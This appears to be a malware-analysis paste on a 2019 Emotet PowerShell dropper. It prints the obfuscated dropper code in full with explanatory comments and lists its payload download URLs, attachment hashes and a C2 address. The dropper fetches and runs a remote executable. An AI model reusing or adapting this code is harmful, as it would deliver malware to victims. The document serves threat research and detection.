HerbieZimmerman

2019-04-24 Emotet
  1. 2019-04-24 Emotet
  2. =================
  3. PoSH Code
  4. ---------
  # Review-bot annotations (comments only; code byte-identical). Emotet maldoc PowerShell dropper.
  # Obfuscation seen below: strings reassembled with -f format operators, cmdlet/method names split
  # with '+' and backticks (new-ob'+'jec'+'t, DownlOad`F`i`lE), and decoy assignments that are never read.
  # Net effect: try each '@'-separated URL in order, save the response as %USERPROFILE%\397.exe, and
  # launch it the first time the saved file is at least 20694 bytes. Do NOT run this sample.
  5. $pXGAA1D=("{1}{0}{2}"-f'ZwA','dBA','B1');  # decoy: evaluates to 'dBAZwAB1', never read
  6. $qAAQx1A = '397';  # file-name stem of the dropped payload
  7. $ABUUZA=("{0}{1}" -f 'k',("{1}{0}" -f("{0}{1}" -f'GU','wA'),'G'));  # decoy: 'kGGUwA', never read
  8. $zAGAXAQA=$env:userprofile+'\'+$qAAQx1A+("{0}{1}"-f'.e','xe');  # drop path: $env:userprofile\397.exe
  9. $Q4U_BGA=("{2}{0}{1}" -f 'AAA','cA','X');  # decoy: 'XAAAcA', never read
  10. $ccA4UDB=&('new-ob'+'jec'+'t') net.`WEbCliE`NT;  # obfuscated New-Object Net.WebClient
  11. $YZB4kQ=("{16}{43}{48}{29}{7}{33}{47}{44}{19}{2}{22}{34}{15}{46}{23}{12}{8}{14}{26}{9}{40}{4}{17}{41}{37}{32}{24}{30}{1}{39}{11}{21}{28}{38}{27}{45}{0}{10}{5}{18}{42}{20}{13}{31}{25}{6}{3}{35}{36}"-f("{0}{1}" -f'pi','nfo'),("{0}{1}" -f 'ng','.n'),("{1}{0}{2}" -f'ad','-',("{1}{0}"-f'/','min')),("{0}{2}{1}"-f 'com',("{1}{0}" -f 'e/','her'),'/t'),'s',("{1}{2}{0}" -f("{1}{0}" -f 'com','a.'),'mat','ic'),'s.','gyn',("{1}{0}{2}"-f 'tp','pha','h'),("{0}{1}{2}" -f("{1}{2}{0}"-f'cl','/wp-','in'),'u','d'),'r',("{2}{0}{1}" -f("{1}{0}"-f '201','_'),'8',("{1}{0}"-f'nu','me')),("{1}{2}{0}" -f 'ez.','ad','s'),'k/@','a','@ht','htt','/V','/','wp',("{1}{0}" -f 'yj',("{0}{1}" -f 'd/J','o')),'/v1','P5p','/',("{0}{1}"-f ':','//d'),("{1}{0}" -f 'g','udy'),("{0}{1}" -f'n',("{1}{0}"-f'com','.')),("{0}{1}"-f':',("{1}{0}"-f'ja','//')),'3X','o',("{3}{0}{1}{2}"-f 'en',("{0}{1}" -f'g','inee'),'ri','kw-'),("{2}{0}{1}" -f 'tp',("{0}{1}"-f ':/','/j'),'ht'),'p','-','e/','I',("{0}{1}"-f 'U','GE/'),("{0}{1}"-f '@h','tt'),("{1}{0}"-f 'p',("{1}{0}{2}" -f '/@h','L','tt')),'et/','e','zj/',("{0}{1}{2}" -f'bo','x',("{0}{1}" -f'cl','ou')),("{0}{1}"-f 'p:','//u'),("{2}{0}{1}{3}" -f ("{0}{1}"-f 'ops.','c'),'om','sh','/'),'s',("{0}{1}"-f't','p:/'),("{1}{0}" -f 'rk','wo'),'r')."SpL`it"('@');  # payload URL list: one '@'-joined string, split into the five http:// URLs listed under 'Domains used' below
  12. $JACQcA=("{0}{1}" -f'C',("{0}{1}" -f 'A',("{1}{0}"-f'AA','Ao')));  # decoy: 'CAAoAA', never read
  13. foreach($q_AGcAUk in $YZB4kQ){try{$ccA4UDB."DownlOad`F`i`lE"($q_AGcAUk, $zAGAXAQA);  # for each URL: WebClient.DownloadFile(url, drop path)
  14. $fAGc1_AQ=("{1}{0}{2}"-f 'UQU','C',("{0}{1}" -f 'AAQ','D'));  # decoy: 'CUQUAAQD', never read
  15. If ((&('Get'+'-'+'Item') $zAGAXAQA)."leNG`TH" -ge 20694) {.('In'+'voke'+'-It'+'em') $zAGAXAQA;  # Get-Item size gate: Invoke-Item (launches the .exe) only if >= 20694 bytes -- presumably to skip error pages / truncated downloads
  16. $sADXDQA=("{0}{1}"-f("{0}{1}" -f ("{0}{1}"-f 'dA','44'),'1'),'U');  # decoy: 'dA441U', never read
  17. break;  # stop at the first URL whose payload was launched
  18. $mAxXQ1XZ=("{0}{1}"-f 'j',("{0}{2}{1}"-f'A','U',("{1}{0}"-f'QA','kA')))}}catch{}}$RQAUDAck=("{1}{0}" -f 'BBA','IDx')  # unreachable decoy after break; catch{} swallows every download/launch error and falls through to the next URL; final decoy 'IDxBBA'
  19.  
  20. Domains used (payload download URLs decoded from the '@'-split list in the script above; each was tried in this order)
  21. ------------
  22. http://urogyn-workshops.com/wp-admin/P5pe/
  23. http://adsez.phatphan.com/wp-includes/Vzj/
  24. http://dkw-engineering.net/menu_2018/v13XL/
  25. http://jaspinformatica.com/boxcloud/Joyjk/
  26. http://judygs.com/there/IUGE/
  27.  
  28. Hashes for attachment (MD5; VirusTotal links where available)
  29. ---------------------
  30. 0f84045b81e1f16e00f0dd56201468e8 --> https://www.virustotal.com/#/file/6c3477e17063e89277bd134d2b27e7b14d8e089246509e4dea1d400aa68d476e/detection
  31. aecd38da598664b6feb6e23d369d64ab
  32. e96332924a6d5bde280444a212f4ebf7 --> https://www.virustotal.com/#/file/2ffb8c50230d55ae57d96801312556d38eaf143052c0942f97b022588c45c722/detection
  33.  
  34. Hash for promptrelated.exe (MD5)
  35. ---------------------------
  36. 24c6fc3d5299e9a4cfba1cf5c5f88719 --> https://www.virustotal.com/#/file/323154c4cb75b02983bc4e076be06997644eb8852384aa8d92b48131bc085f00/detection
  37.  
  38. C2:
  39. ---
  40. 185.94.252.27:443